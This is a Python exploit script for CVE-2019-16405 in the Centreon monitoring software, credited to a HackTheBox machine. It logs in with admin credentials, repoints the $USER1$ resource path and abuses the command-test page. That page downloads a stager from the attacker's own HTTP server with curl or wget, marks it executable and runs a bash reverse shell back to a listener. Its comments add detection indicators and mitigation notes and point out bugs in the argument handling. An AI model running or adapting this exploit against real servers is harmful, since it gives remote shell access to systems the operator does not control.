# Credits banner; it is only ever printed as part of the usage message below.
info = """
###################################################################################
# Thanks to BirdsArentReal team contribution at HackTheBox platform! #
# Discovered at https://hackthebox.eu - Machine Wall #
# enjloezz & TheCyberGeek #
###################################################################################
"""
import requests
import re
import sys
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer
import _thread
class S(BaseHTTPRequestHandler):
    """Stager request handler: answers every GET with the same bash script.

    The response body is built from the module-level ``ip`` and ``port``
    (the listener given on the command line) and is a bash one-liner that
    connects back to that address. Because the body is sent in clear text
    over HTTP, the full second stage is visible to anyone inspecting the
    traffic between the target and this host.
    """
    def do_GET(self):
        # Path is ignored; any request gets the script.
        self.send_response(200)
        # ``ip``/``port`` here are the module globals set from argv, not the
        # ``port`` parameter of run() (which is the stager's own listen port).
        self.wfile.write("""#!/bin/bash\nbash -i >& /dev/tcp/{}/{} 0>&1""".format(ip, port).encode("utf-8"))
def run(server_class=HTTPServer, handler_class=S, port=80):
    """Serve the stager forever on all interfaces.

    Args:
        server_class: server type to instantiate (HTTPServer by default).
        handler_class: request handler (S, which serves the bash script).
        port: TCP port to bind. Defaults to 80, which normally requires
            elevated privileges; the caller below starts it with no
            arguments, so the default applies.

    Never returns: serve_forever() blocks, which is why it runs in a thread.
    """
    # '' binds every local interface, so the script is reachable from the target.
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    httpd.serve_forever()
# --- Main flow for CVE-2019-16405 (Centreon), as implemented on this page ---
# Preconditions visible below: valid Centreon credentials, a listener on
# ip:port, and this host serving the stager on port 80 (see run()).
# Defensive notes: the distinctive web-log artefacts are a POST to
# /main.get.php?p=60904 that sets the $USER1$ resource_line to "/", followed by
# GET requests to /main.get.php?p=60801 whose command_line parameter carries
# shell commands. Host-side, an outbound HTTP fetch from the Centreon server,
# a new executable /tmp/shell and, presumably, a bash child of the web-server
# process are the indicators. Mitigation is the vendor fix for
# CVE-2019-16405; since the flow starts with a normal login, restricting who
# holds Centreon admin credentials also limits exposure.
if len(sys.argv) < 6:
    # Usage banner. Note the guard accepts six argv entries while the else
    # branch reads sys.argv[6], which needs seven.
    print(info)
    print("Start Listener before start exploit")
    print("Methods: curl, wget")
    print("Usage:\texploit.py url username password ip port curl")
    print("Ex:\texploit.py http://10.0.0.2/centreon admin S3cUr3_p4ssw0rd 10.0.0.1 4444 curl")
    sys.exit(0)
else:
    # Positional arguments: ip/port are the listener the reverse shell
    # connects back to; method selects the downloader run on the target.
    base_path, username, password, ip, port, method = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6]
    # Stager thread on 0.0.0.0:80 (run()'s default, no arguments passed).
    _thread.start_new_thread(run,())
    s = requests.Session()
    # Step 1: load the login page and extract the centreon_token form field.
    f = s.get(base_path + "/index.php")
    # .group(1) raises AttributeError when the pattern does not match, so the
    # "Couldn't get token" branch is only reached for an empty captured value.
    token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
    if token:
        # Step 2: authenticate with the supplied credentials.
        f = s.post(base_path + "/index.php", data={"useralias": username, "password": password, "centreon_token": token, "submitLogin": "Connect"})
        # Login success is inferred from a fixed string in the post-login page.
        if "You need to enable JavaScript to run this app" in f.text:
            print("Login Successful!")
            # Step 3: open the edit form for resource id 1 ($USER1$, commented
            # in the form as "Nagios Plugins Path"), take a fresh token and
            # remember the current value so it can be restored at the end.
            f = s.get(base_path + "/main.get.php?p=60904&o=c&resource_id=1")
            token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
            old_path = re.search("""name="resource_line".* value="(.*?)" />""", f.text).group(1)
            # Step 4: set $USER1$ to "/" — presumably so the absolute paths in
            # command_line below are accepted by the server; TODO confirm
            # against the Centreon code for the affected version.
            f = s.post(base_path + "/main.get.php?p=60904", data={"resource_name": """$USER1$""", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": """a:0:{}""", "centreon_token": token})
            print("Sending Payload")
            # Step 5: p=60801 with command_line appears to be the command-test
            # page, which runs the given command. First request fetches
            # shell.sh from the stager into /tmp/shell; curl or wget is chosen
            # by comparing `method` with `is` (object identity, not equality).
            s.get(base_path + "/main.get.php?p=60801&command_hostaddress=&command_example=&command_line={}&o=p&min=1".format(urllib.parse.quote("/bin/bash -c \"" + ( "curl {}/shell.sh -o".format(ip) if "curl" is method else "wget {}/shell.sh -O".format(ip) ) + "/tmp/shell\"")))
            print("Setting permissions for the payload")
            # Step 6: make the downloaded file executable (world-writable too).
            s.get(base_path + "/main.get.php?p=60801&command_hostaddress=&command_example=&command_line={}&o=p&min=1".format(urllib.parse.quote("/bin/bash -c \"chmod 777 /tmp/shell\"")))
            print("Executing Payload\nCheck your listener!")
            # Step 7: run it; the script served by do_GET connects to ip:port.
            s.get(base_path + "/main.get.php?p=60801&command_hostaddress=&command_example=&command_line={}&o=p&min=1".format(urllib.parse.quote("/tmp/shell")))
            # Step 8: restore the original $USER1$ value. This undoes the
            # configuration change only; the request log entries from steps
            # 4-7 and /tmp/shell on the host remain.
            f = s.post(base_path + "/main.get.php?p=60904", data={"resource_name": """$USER1$""", "resource_line": old_path, "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": """a:0:{}""", "centreon_token": token})
        else:
            print("Cannot login to Centreon")
    else:
        print("Couldn't get token, check your URL")